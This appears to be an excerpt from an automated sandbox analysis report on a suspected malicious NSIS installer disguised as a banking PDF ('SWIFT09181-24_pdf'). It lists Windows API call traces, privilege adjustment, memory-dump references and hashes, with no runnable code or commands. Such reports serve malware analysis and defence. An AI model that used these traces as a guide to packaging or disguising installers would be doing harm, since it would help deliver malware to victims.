                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(00441800,000003FB), ref: 004034D6
                                                                                                                                    • lstrcatW.KERNEL32(00441800,\Temp), ref: 004034E2
                                                                                                                                    • GetTempPathW.KERNEL32(000003FC,00441800,00441800,\Temp), ref: 004034F6
                                                                                                                                    • lstrcatW.KERNEL32(00441800,Low), ref: 004034FE
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,00441800,00441800,Low), ref: 0040350F
                                                                                                                                    • SetEnvironmentVariableW.KERNEL32(TMP,00441800), ref: 00403517
                                                                                                                                    • DeleteFileW.KERNEL32(00441000), ref: 0040352B
                                                                                                                                      • Part of subcall function 00406055: lstrcpynW.KERNEL32(0040A300,0040A300,00000400,00403350,00433F00,NSIS Error), ref: 00406062
                                                                                                                                    • OleUninitialize.OLE32(?), ref: 004035F6
                                                                                                                                    • ExitProcess.KERNEL32 ref: 00403618
                                                                                                                                    • lstrcatW.KERNEL32(00441800,~nsu,0043F000,00000000,?), ref: 0040362B
                                                                                                                                    • lstrcatW.KERNEL32(00441800,0040A26C,00441800,~nsu,0043F000,00000000,?), ref: 0040363A
                                                                                                                                    • lstrcatW.KERNEL32(00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403645
                                                                                                                                    • lstrcmpiW.KERNEL32(00441800,00440800,00441800,.tmp,00441800,~nsu,0043F000,00000000,?), ref: 00403651
                                                                                                                                    • SetCurrentDirectoryW.KERNEL32(00441800,00441800), ref: 0040366D
                                                                                                                                    • DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00435000,?), ref: 004036C7
                                                                                                                                    • CopyFileW.KERNEL32(00442800,0042AA28,00000001), ref: 004036DB
                                                                                                                                    • CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000), ref: 00403708
                                                                                                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 00403737
                                                                                                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 0040373E
                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403753
                                                                                                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 00403776
                                                                                                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 0040379B
                                                                                                                                    • ExitProcess.KERNEL32 ref: 004037BE
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpyn
                                                                                                                                    • String ID: .tmp$Error launching installer$Low$NSIS Error$SETUPAPI$SeShutdownPrivilege$TEMP$TMP$USERENV$UXTHEME$\Temp$~nsu
                                                                                                                                    • API String ID: 3586999533-3972089011
                                                                                                                                    • Opcode ID: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                                    • Instruction ID: 84ba5929d45b1413e1818888a5ef7abe037fd34abcf77f3f73da9f6cce4da4cf
                                                                                                                                    • Opcode Fuzzy Hash: b76b61fe59c96232ee09de7477e4ba1d3ea630d83fddd21a04d7d9ff3721efeb
                                                                                                                                    • Instruction Fuzzy Hash: 35D1F870500300ABD310BF659D49A3B3AADEB8174AF51443FF581B62E2DB7D8945876E
                                                                                                                                    APIs
                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404B48
                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404B53
                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404B9D
                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404BB0
                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,00405128), ref: 00404BC9
                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404BDD
                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404BEF
                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404C05
                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404C11
                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404C23
                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404C26
                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404C51
                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404C5D
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404CF3
                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000000), ref: 00404D1E
                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404D32
                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404D61
                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404D6F
                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404D80
                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404E7D
                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404EE2
                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404EF7
                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404F1B
                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404F3B
                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404F50
                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404F60
                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404FD9
                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00405082
                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00405091
                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 004050B1
                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004050FF
                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 0040510A
                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00405111
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                    • String ID: $M$N
                                                                                                                                    • API String ID: 1638840714-813528018
                                                                                                                                    • Opcode ID: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                                    • Instruction ID: 943130f726a074c81f80d4b2a4465e83a32f395645510c1f9de1d6fa8cfacfb7
                                                                                                                                    • Opcode Fuzzy Hash: 4cbb5e0717cdc748ffed23d4a8be9d35437acf42fd757cc9a3c8c6ab170577e7
                                                                                                                                    • Instruction Fuzzy Hash: 0A028FB0900209EFDB209F64DD85AAE7BB5FB84314F14857AF610BA2E1C7789D42DF58
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "$0oAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$LjAp$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                                                                                                    • API String ID: 0-2009027844
                                                                                                                                    • Opcode ID: 0c1be08960d9de8f425da84362cc384fc256d8fb46877425daba689b97782fed
                                                                                                                                    • Instruction ID: 09f062020013ec431d901746cfab1a791e158c2a03496fcab655acc449841028
                                                                                                                                    • Opcode Fuzzy Hash: 0c1be08960d9de8f425da84362cc384fc256d8fb46877425daba689b97782fed
                                                                                                                                    • Instruction Fuzzy Hash: 2D329F74E01218CFEB64CFA5C994B9DBBB2BF89300F1080A9D509AB365DB759E85CF50
                                                                                                                                    APIs
                                                                                                                                    • DeleteFileW.KERNEL32(?,?,74DF3420,00441800,0043F000), ref: 0040586F
                                                                                                                                    • lstrcatW.KERNEL32(0042F270,\*.*,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058B7
                                                                                                                                    • lstrcatW.KERNEL32(?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058DA
                                                                                                                                    • lstrlenW.KERNEL32(?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058E0
                                                                                                                                    • FindFirstFileW.KERNEL32(0042F270,?,?,?,0040A014,?,0042F270,?,?,74DF3420,00441800,0043F000), ref: 004058F0
                                                                                                                                    • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,0040A300,0000002E), ref: 00405990
                                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040599F
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2922616706.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000005.00000002.2922599143.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922634766.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922652826.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000005.00000002.2922681465.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                    • String ID: \*.*
                                                                                                                                    • API String ID: 2035342205-1173974218
                                                                                                                                    • Opcode ID: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                                    • Instruction ID: 3422579b2d55acfa562187ab3f611d485c5dde76635b84dd87a68d04928cc13f
                                                                                                                                    • Opcode Fuzzy Hash: 758a93316bd333329ed0a6d4f3bd80d9b1b6158e35c963d2e10a1872ebc8ab6d
                                                                                                                                    • Instruction Fuzzy Hash: 4541F270900A04EADF21AB618C89BBF7678EF41724F14823BF801B51D1D77C49859E6E
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: "$0oAp$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q$PH^q
                                                                                                                                    • API String ID: 0-2641638890
                                                                                                                                    • Opcode ID: 7daea1356bb133811c2580ed78e6a6d99776e585ce5a137f45773e2505e463d2
                                                                                                                                    • Instruction ID: 4c9113f7436bb657d2844a562082bc93db4602d3812e60bec258cd4459e09c24
                                                                                                                                    • Opcode Fuzzy Hash: 7daea1356bb133811c2580ed78e6a6d99776e585ce5a137f45773e2505e463d2
                                                                                                                                    • Instruction Fuzzy Hash: 9102A174E012188FEB68CFA5C954BDDBBB2BF89300F1081A9D509AB365DB759E85CF10
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: .5vq
                                                                                                                                    • API String ID: 0-493797296
                                                                                                                                    • Opcode ID: 0d7ae483b30c3c80b8cdffb85c8124d9fcf5bbfa96d183c01d8dabe8862f20e2
                                                                                                                                    • Instruction ID: ba1974f7b3379a2b6320d58cfee9c63ea9580c7ddcbf1902c1ffe6d29ae4f865
                                                                                                                                    • Opcode Fuzzy Hash: 0d7ae483b30c3c80b8cdffb85c8124d9fcf5bbfa96d183c01d8dabe8862f20e2
                                                                                                                                    • Instruction Fuzzy Hash: 18629D74E01228CFDB64DFA5C984B9DBBB2BF89301F1085E9E409AB255DB319E85CF50
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 016cc3d3de7621790a0418669106a70cb757404ab548a66fd8e964846c7d8036
                                                                                                                                    • Instruction ID: f7ef4844bc07c63827ef2713184605ec5d5a4b1076a34bc4e28c458d7fa82af0
                                                                                                                                    • Opcode Fuzzy Hash: 016cc3d3de7621790a0418669106a70cb757404ab548a66fd8e964846c7d8036
                                                                                                                                    • Instruction Fuzzy Hash: E0C1B074E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D409BB365DB359E85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: a33ea28bb7089f5d91175aef0505bafd6563cf025ae3aea7f764e9410fef26b8
                                                                                                                                    • Instruction ID: 978ac65ed4ddc2e865dbd0f657d5af2f603014c343ce08c9ad0999d25327e3cb
                                                                                                                                    • Opcode Fuzzy Hash: a33ea28bb7089f5d91175aef0505bafd6563cf025ae3aea7f764e9410fef26b8
                                                                                                                                    • Instruction Fuzzy Hash: 39C1B174E00218CFEB14DFA9C994B9DBBB2AF89305F1081A9D409AB365DB359E85CF10
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 86a04bc375a8abd5842ac9c430da23ed9ecc836630625ded27caa4cc8d8dd020
                                                                                                                                    • Instruction ID: 52f05c57028b51951922fbe15e7a592816f9a4725f4f54e8add60b2c961e3968
                                                                                                                                    • Opcode Fuzzy Hash: 86a04bc375a8abd5842ac9c430da23ed9ecc836630625ded27caa4cc8d8dd020
                                                                                                                                    • Instruction Fuzzy Hash: C6C1C274E00218CFEB14DFA5C994B9DBBB2AF89305F2081A9D408BB355DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c202756fb00fff197427ecb7999b428054a84f07bd3b546065dbe5ea637dbbfb
                                                                                                                                    • Instruction ID: ca5af25edcc6844215d648d2bd306fbb70915efeb29e11303383c141c83be522
                                                                                                                                    • Opcode Fuzzy Hash: c202756fb00fff197427ecb7999b428054a84f07bd3b546065dbe5ea637dbbfb
                                                                                                                                    • Instruction Fuzzy Hash: D9C1B074E00218CFEB14DFA9C994B9DBBB2AF89304F1081A9D409BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6a82a3948d12d0e94449cd19229b6bbfe34aa2d7f2b01e757e5edae24d452b1b
                                                                                                                                    • Instruction ID: 8c12241fddb6a515e4438f321e6cce5048ff27354034234b84b4ae4221e6c4d0
                                                                                                                                    • Opcode Fuzzy Hash: 6a82a3948d12d0e94449cd19229b6bbfe34aa2d7f2b01e757e5edae24d452b1b
                                                                                                                                    • Instruction Fuzzy Hash: B3C1B174E00218CFEB14DFA5C994B9DBBB2AF89305F1081A9D809BB365DB359E85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951033157.0000000037910000.00000040.00000800.00020000.00000000.sdmp, Offset: 37910000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_37910000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9efebd5ba08264bea3fd30de7ede78515ef5c8d966f3cee10909a31c66e2d92d
                                                                                                                                    • Instruction ID: 33c9658da51cfd56e69c704afcf1ecbf716a3a86dd7030c3f593741103ef64f7
                                                                                                                                    • Opcode Fuzzy Hash: 9efebd5ba08264bea3fd30de7ede78515ef5c8d966f3cee10909a31c66e2d92d
                                                                                                                                    • Instruction Fuzzy Hash: 04C1A074E00218CFEB14DFA5C994B9DBBB2AF89305F2081A9D408BB365DB359E85CF11
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 34e2715b17c9838487811964b44903a39ec56168babba81753047fa7457db677
                                                                                                                                    • Instruction ID: 1333fb50582d42f7185f12d42817b9365d1ec28d3df7d3a3003ab368d52e29d9
                                                                                                                                    • Opcode Fuzzy Hash: 34e2715b17c9838487811964b44903a39ec56168babba81753047fa7457db677
                                                                                                                                    • Instruction Fuzzy Hash: 9BC1AE74E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D409AB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 60e4f68b3ad79bd7f924616bdef616422165d13d28b455f9ecbded12ac1c817c
                                                                                                                                    • Instruction ID: 6903e50ffae7f83bcbc6e12e83013cf7fd9a58beeb102aaed9713b86deef890f
                                                                                                                                    • Opcode Fuzzy Hash: 60e4f68b3ad79bd7f924616bdef616422165d13d28b455f9ecbded12ac1c817c
                                                                                                                                    • Instruction Fuzzy Hash: 25C1C074E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D409BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 466200df559d954871e25739fd7a3a4174beb2a5ac9cd14a714afa789500c770
                                                                                                                                    • Instruction ID: 5bd3800b6a4e82a240b2160fd502a2ab040b1fe96ef06ed5c01e580f4819608e
                                                                                                                                    • Opcode Fuzzy Hash: 466200df559d954871e25739fd7a3a4174beb2a5ac9cd14a714afa789500c770
                                                                                                                                    • Instruction Fuzzy Hash: 2FC1BE74E00218CFEB54DFA5C994B9DBBB2AF89304F2081A9D408BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fc636d8b57a83ab4db805aa9f9dc088986a107979f445b0feff3d51b45f11118
                                                                                                                                    • Instruction ID: 49a79e601129ad0654024c860532b81b849037d24c0688ab501e202522c77736
                                                                                                                                    • Opcode Fuzzy Hash: fc636d8b57a83ab4db805aa9f9dc088986a107979f445b0feff3d51b45f11118
                                                                                                                                    • Instruction Fuzzy Hash: 92C1CF74E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D409BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2f9115365c75d258a1f2aaa56ec49bc90cd10adb88d177d4ae3dbbcf41636ab5
                                                                                                                                    • Instruction ID: 1ba7f67ab42e9cada83d16865678779258fb29d2e1599028e627db0d6470cdb8
                                                                                                                                    • Opcode Fuzzy Hash: 2f9115365c75d258a1f2aaa56ec49bc90cd10adb88d177d4ae3dbbcf41636ab5
                                                                                                                                    • Instruction Fuzzy Hash: EBC1A074E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D409BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b9d5cebd3d45143f18fc3bae10114bc0c7b0f8c87ed2f51689b5a98010a0c078
                                                                                                                                    • Instruction ID: f5bc4b327dc635c4775c97f3fcf13f94ac95c784792f2b50a84f1c89011c79fa
                                                                                                                                    • Opcode Fuzzy Hash: b9d5cebd3d45143f18fc3bae10114bc0c7b0f8c87ed2f51689b5a98010a0c078
                                                                                                                                    • Instruction Fuzzy Hash: 4CC1CE74E01218CFEB14DFA5C994B9DBBB2AF89304F2081A9D408BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d1eb59bafe68c2eeed97a77102dd6743c646b190547194d9756bb7e6d6d2a329
                                                                                                                                    • Instruction ID: 3a603ab5e48b3020076c6e19ae92f806c5914bb8d2e6fdb680be6bf42fc73b1a
                                                                                                                                    • Opcode Fuzzy Hash: d1eb59bafe68c2eeed97a77102dd6743c646b190547194d9756bb7e6d6d2a329
                                                                                                                                    • Instruction Fuzzy Hash: 08C1BF74E00218CFEB14DFA5C994B9DBBB2AF89301F2081A9D409BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9a7b728e71f172e61ea213002d5769d6353f6b747636f53a291c04dd418bcbcc
                                                                                                                                    • Instruction ID: 0cd3b92f0a53147c692e5654e2df04a703199de786129cbe531fcd2acc5a51e8
                                                                                                                                    • Opcode Fuzzy Hash: 9a7b728e71f172e61ea213002d5769d6353f6b747636f53a291c04dd418bcbcc
                                                                                                                                    • Instruction Fuzzy Hash: 13C1BF74E00218CFEB54DFA5C994B9DBBB2AF89304F2081A9D408BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 9c16f5c2215141773dea549a32e6c4a7c1807398620b25468ce2f72c50d2ae0c
                                                                                                                                    • Instruction ID: 6ca09dc85d23e513e8cede4c58a29198d7ec846fff6c573128342a0bf773d572
                                                                                                                                    • Opcode Fuzzy Hash: 9c16f5c2215141773dea549a32e6c4a7c1807398620b25468ce2f72c50d2ae0c
                                                                                                                                    • Instruction Fuzzy Hash: 66C1B074E00218CFEB14DFA5C994B9DBBB2AF89304F2081A9D409BB365DB359E85CF51
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.2951886199.000000003A650000.00000040.00000800.00020000.00000000.sdmp, Offset: 3A650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_3a650000_SWIFT09181-24_pdf.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 4bd8e6a6af0f13621d794f23e655c2b3d6d452a6b92d903cab0afc8eaa36e215
                                                                                                                                    • Instruction ID: 99db80659ea9a12276443219289360f50bf627d65e8fd4bb4311e18dafd76462
                                                                                                                                    • Opcode Fuzzy Hash: 4bd8e6a6af0f13621d794f23e655c2b3d6d452a6b92d903cab0afc8eaa36e215
